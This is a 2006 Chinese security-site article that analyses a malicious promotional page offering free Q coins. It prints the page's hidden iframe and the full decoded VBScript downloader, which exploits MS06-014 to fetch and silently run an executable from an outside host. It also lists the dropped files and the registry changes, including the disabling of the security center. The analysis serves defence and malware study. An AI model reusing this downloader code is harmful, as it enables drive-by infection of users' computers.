·	没有路由密码权限时的鸽	08-23	·	上网安全 Vista自我防范	10-11
·	让濒临崩溃的Windows XP	10-11	·	有备无患，快速自制救急	10-11
·	要你好看!Windows看图工	10-11	·	空间赞助网提供不同类型	10-11
·	讨论net.exe和net1.exe的	10-10	·	让3389远程桌面传输更通	10-10
·	巧妙入侵渗透赌博站	10-10	·	Aspx空间扫权限工具	10-10
·	Windows2003最新提权工具	10-10	·	易淘乐提供100M免费全能	10-10
·	系统开机密码忘了不着急	10-09	·	中意网络提供免费100M免	10-09
·	与众不同 Windows XP开始	10-08	·	让桌面图标翻跟斗在XP上	10-08
·	上海宽元站长资助计划-提	10-08	·	个性化Windows XP的任务	10-07
·	趣盘提供3G免费网络硬盘	10-07	·	秀山热线提供200MB免费全	10-07
·	一次艰辛的提权过程	10-06	·	成功入侵IT大卖场的渗透	10-06
·	mysqlhack- MYSQL利用工	10-06	·	lanker一句话PHP后门客户	10-06
·	WIXI提供3G免费多媒体网	10-06	·	新人网络提供100M/ftp免	10-06
·	如何利用QQ带来高流量	10-05	·	UuShare提供免费网络文件	10-05

[推荐]互联星空挂的一个强马，禁用杀软服务,这种Q币贪不得

热荐 ★★★★★

互联星空挂的一个强马，禁用杀软服务,这种Q币贪不得

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2006-12-2 10:26:56

今天群里有人发了浙江互联星空现在答题送QB了，今天搞活动，活动地址 hXXp://zj.vnetqqx.cn
偶也想去看，另一个人说有毒。我去看了下代码真的有问题

代码前部有
<iframe src==hXXp://www.jrrmai.com/ad/goldsun.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>

再看hXXp://www.jrrmai.com/ad/goldsun.htm代码，有一个加密的VBS，用FSO还原出来后
<html>
<script language="VBScript">
on error resume next
dl = "hXXp://www.jrrmai.com/ad/down.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="g0ld.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
<head>
<title>Oh,my god! Goldsun[at]84823714</title>
</head><body>
<center>You DO it!</center>
</body></html>
利用MS06-14漏洞下载hXXp://www.jrrmai.com/ad/down.exe

我把这样本下来运后，释放文件
C:\Program Files\Common Files\Microsoft Shared\MSINFO\A8C22524.dll
C:\Program Files\Common Files\Microsoft Shared\MSINFO\A8C22524.dat
C:\WINDOWS\Help\wshmcepts.chm
C:\WINDOWS\system32\wdfmgr32.exe
C:\WINDOWS\svchost.exe
C:\WINDOWS\system32\tmdqq.exe
C:\WINDOWS\system32\systen.exe
C:\WINDOWS\system32\verclsid.exe(系统文件) 修改为 C:\WINDOWS\system32\verclsid.exe.bak

产生相关的注册表

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks分支添加
{2252A8C2-A8C2-2524-C225-8C2528C22524}

HKCR\CLSID\{A48AA915-9150-5091-948A-09094A91508A}\InProcServer32\（默认）
修改为C:\Program Files\Common Files\Microsoft Shared\MSINFO\A8C22524.dll

注册表键： HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
值： C:\WINDOWS\system32\wdfmgr32.exe

注册表键：HKLM\SYSTEM\CurrentControlSet\Services\system
值：C:\WINDOWS\svchost.exe

修改HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\Start
00000002 为 00000004

[1] [2] 下一页

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章：本周新增5款恶意软件利字当头顶风作案

下一篇文章：被感染的tel.xls.exe mmc.exe 解决方案

【字体：小大】

中介交易区

最新热门

08年网络账号防盗最强手册	08-18
360卫士发布“装机必备软件”下载	02-13
认清本质计算机病毒防治常遇问题	01-24
防止木马有效率90%以上的最有效办	01-21
彻底杜绝U盘病毒多重防护力保平	01-18
彻底杜绝U盘病毒多重防护力保平	01-16
利用微点软件防御机器狗病毒(ED	01-15
如何摆脱黑客攻击方法	01-06
不再重装手动清除顽固病毒AutoR	01-06
主动出击让系统远离危害(图)	01-06
如何清除能突破主动防御的新型木	01-06
[攻防手记]手工清理病毒原来可以	01-06

用百度空间钓鱼（挂马）的新方式
阻止网页挂马的若干工具
百度首页惊爆挂马漏洞
强悍挂马工具：IIS_AD IIS扩展(附源代码
最近比较流行的数据库挂马
完全解析网页后门和挂马
利用404错误页面挂马
PHP批量挂马脚本
能检测网站是否被挂马的浏览器
一行代码解决iframe挂马（包含服务器端
如何杜绝iframe挂马
天空软件站被挂马

ICP备案：冀06009886

站长统计..